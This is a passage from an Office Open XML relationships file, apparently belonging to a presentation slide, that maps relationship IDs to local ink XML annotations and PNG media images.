Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1042.xml"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1053.xml"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1071.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1270.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink946.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1490.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink960.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink961.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1630.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink982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995.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1003.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1079.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1240.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink935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018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810.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1350.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1026.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1037.xml"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1048.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1066.xml"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink955.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1580.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink977.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1790.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink998.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png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021.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1032.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2320.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink949.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1530.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink972.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1740.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1077.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1470.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink993.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1940.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1016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611.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1059.xml"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink944.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink967.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1690.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1072.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink988.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1890.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1009.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1011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customXml" Target="../ink/ink1043.xml"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1054.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink939.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1412.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink962.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1640.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1067.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink956.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink983.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1850.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1004.xml"/><Relationship Id="rId331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027.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1038.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1360.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1590.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1049.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink978.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1800.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink999.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2000.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2020.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1022.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1033.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1312.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink950.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1044.xml"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1540.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink973.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1750.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink994.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1950.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1078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7.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1208.xml"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1210.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1089.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1430.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1712.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1138.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1154.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1161.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2140.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2240.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1112.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1203.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1084.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1380.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1660.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1133.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1226.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1081.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1106.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1820.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1149.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2090.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1177.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1188.xml"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1198.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1330.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1100.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1612.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1128.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1221.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1770.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1144.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1970.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2040.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1172.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1183.xml"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1193.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1280.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1095.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1560.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1123.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1216.xml"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1500.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1720.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1139.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1920.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1167.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1250.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2200.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2300.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1090.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1118.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1204.xml"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1211.xml"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1440.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1670.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1134.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1870.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1155.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1162.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2150.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2250.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1085.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1113.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1189.xml"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1199.xml"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1227.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1390.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1107.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1620.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1129.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1082.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1480.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1830.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1150.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1165.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2100.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2180.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1178.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1080.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1093.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1184.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2280.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1194.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1207.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1340.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1420.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1101.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1570.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1116.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1124.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1700.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1137.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1900.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1209.xml"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1222.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1780.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1145.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1980.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1158.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1160.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2050.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1173.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1088.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2130.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1179.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2230.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2312.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1191.xml"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1202.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1290.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1370.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1096.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1520.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1111.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1650.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1132.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1860.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1217.xml"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1225.xml"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1260.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1105.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1512.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1119.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1730.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1140.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1930.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1153.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1168.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2080.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2160.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1176.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2260.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1187.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1197.xml"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1091.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image349.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1600.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1127.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1812.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId293" 